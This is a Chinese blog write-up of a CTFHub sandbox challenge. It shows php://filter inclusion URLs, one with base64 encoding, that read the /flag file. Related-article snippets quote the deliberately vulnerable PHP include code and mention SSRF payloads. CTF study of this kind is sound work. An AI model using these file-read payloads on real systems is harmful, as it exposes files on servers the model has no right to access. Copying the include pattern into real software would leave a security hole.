ctfhub-读取源代码

最新推荐文章于 2023-06-10 22:45:31 发布
最新推荐文章于 2023-06-10 22:45:31 发布
阅读量1.9k 收藏 2
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/helen1994/article/details/112651688
版权

看源码:
在这里插入图片描述
试了试 php://input 发现用不了。

应该是条件不允许:
在这里插入图片描述
然后,题目叫做读取源码,所以想到可以使用 php://filter 。
然后构造 url

http://challenge-948e58fa50c767e6.sandbox.ctfhub.com:10080/?file=php://filter/resource=/flag

在这里插入图片描述
一开始就告诉了flag的位置,就可以直接构造url

或者可以用这个,让flag以base64加密的方式输出:

?file=php://filter/read=convert.base64-encode/resource=/flag

在这里插入图片描述

At0m_
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
读取xml文件内容的源代码
06-09
读取xml文件内容的源代码
Visual C++源代码 111 如何使用数据读取器逐行读取记录
06-18
Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visual C++源代码 111 如何使用数据读取器逐行读取记录Visua
ADC7871 读取数据源代码
04-18
ADC7871 读取数据源代码
32-adc源代码
01-01
11.1Exp_ADC_单通道(中断读取
ctfwebscan:CTF比赛中web原始码扫描
03-23
ctf网络扫描 CTF中web原始码扫描 描述 使用python的requests,功能比较简单,字典有待完善。目前只支持php。 特征 支持扫描类型 www.zip包www.zip code.tar.gz ... 敏感文件- admin.php flag.php ... 敏感目录- /admin /upload ... 编辑器源码备份- xxx.php~ xxx.php.bak .xxx.php.swp .xxx.php.swo 扫描过程 对原始包进行扫描 对敏感文件进行扫描 对已知敏感文件进行原始码备份扫描 对敏感目录进行扫描 对已知目录下的敏感文件进行扫描 再进行原始码扫描扫描 用法 所有网址必须以/结尾 python main.py -u [url] 独立 python main.py -f [file] 批量 Vim的意外退出时会产生交换文件.swp .swo .swn等; vi
CTFhub 提取源代码
qq_41497476的博客
07-27 1331
<?php error_reporting(E_ALL); if (isset($_GET['file'])) { if ( substr($_GET["file"], 0, 6) === "php://" ) { include($_GET["file"]); } else { echo "Hacker!!!"; } } else { highlight_file(__FILE__); } ?> <hr> i don'
CTFHub | 读取源代码
尼泊罗河伯的博客
06-10 1696
打开网页发现源代码,还是和之前一样php:// 。提示说 flag 在代码中,并且在 /flag 文件夹中,题目名字叫读取源代码
CTFHub技能书解题笔记-RCE-读取源代码
qq_43006864的博客
03-30 1475
打开题目,读取源代码。直接开整。 题目界面就是源代码。和上一道一样,但是代码有所变化。 if ( substr($_GET["file"], 0, 6) === "php://" ) #返回file里面第0个到第6个字符,且要等于 php:// 。 那既然要等于php://,就和上题一样,试试php://input 芜湖了,好像没用。这里的input是不起作用,看大佬说是allow_url_fopen没有开启。 题目要求又必须使用php://。而且flag就在/flag里。 这里引...
文件包含————ctfhub之读取源文件
qq_45655564的博客
05-29 695
php://filter php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。 PHP.ini: php://filter在双off的情况下也可以正常使用; allow_url_fopen :off/on allow_url_include:off/on 举例: http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php CT
【CTF】CTFHub------web-HTTP协议-响应包源代码
从零开始的网安生活
07-22 386
** 响应包源代码 ** 1.点击链接进入,直接按F12获得flag
MCUCapture数据读取画图 C#源代码
07-11
MCUCapture数据读取画图 C#源代码,是源代码。用于读取单片机数据并画图,仅供学习使用。
CTFHub_技能树_Web之RCE——“读取源代码
Ho1aAs‘s Blog
07-28 1595
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程 查看网页显示的源码 这里就不能将指令POST上去了,图中又提示了必须使用php://,FLAG在/flag内 因此想到过滤器filter 直接访问?file=php://filter/resource=/flag得到FLAG 完 欢迎在评论区留言 感谢浏览 ...
ctfhub RCE
qq_44640313的博客
01-18 284
ctfhub rce的WP
CTFHUB-HTTP协议(五)------响应包源代码
Y4tacker的博客
07-22 9852
最憨批的题目,第一眼看到这个还以为要去通过解析元素获取到⚪的坐标,结果按一下F12就出来答案了 还这么明显
前18大旋转修整器企业占据全球87%的市场份额.docx
05-06
前18大旋转修整器企业占据全球87%的市场份额
Planet-SkySat-Imagery-Product-Specification-Jan2020.pdf
05-06
SKYSAT IMAGERY PRODUCT SPECIFICATION PLANET.COM VIDEO Full motion videos are collected between 30 and 120 seconds by a single camera from any of the active SkySats. Videos are collected using only the Panchromatic half of the camera, hence all videos are PAN only. Videos are packaged and delivered with a video mpeg-4 file, plus all image frames with accompanying video metadata and a frame index file (reference Product Types below)
Screenshot_20240506_133458_com.netease.yhtj.vivo.jpg
05-06
Screenshot_20240506_133458_com.netease.yhtj.vivo.jpg
2019年A~F题特等奖论文合集.pdf
最新发布
05-06
大学生,数学建模,美国大学生数学建模竞赛,MCM/ICM,历年美赛特等奖O奖论文
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHub—SSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值